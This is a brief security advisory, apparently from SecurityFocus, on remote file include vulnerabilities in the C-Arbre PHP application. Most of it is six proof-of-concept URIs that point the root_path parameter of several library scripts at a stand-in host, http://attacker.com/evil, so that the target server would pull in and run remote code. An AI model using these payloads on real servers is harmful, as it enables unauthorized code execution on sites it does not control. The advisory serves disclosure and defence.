C-Arbre Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[C-Abre_path]/lib/Richtxt_functions.inc.php?root_path=http://attacker.com/evil?
http://www.example.com/[C-Abre_path]/lib/adddocfile.php?root_path=http://attacker.com/evil?
http://www.example.com/[C-Abre_path]/lib/auth_check.php?root_path=http://attacker.com/evil?
http://www.example.com/[C-Abre_path]/lib/browse_current_category.inc.php?root_path=http://attacker.com/evil?
http://www.example.com/[C-Abre_path]/lib/docfile_details.php?root_path=http://attacker.com/evil?
http://www.example.com/[C-Abre_path]/lib/main.php?root_path=http://attacker.com/evil?


 

Privacy Statement
Copyright 2010, SecurityFocus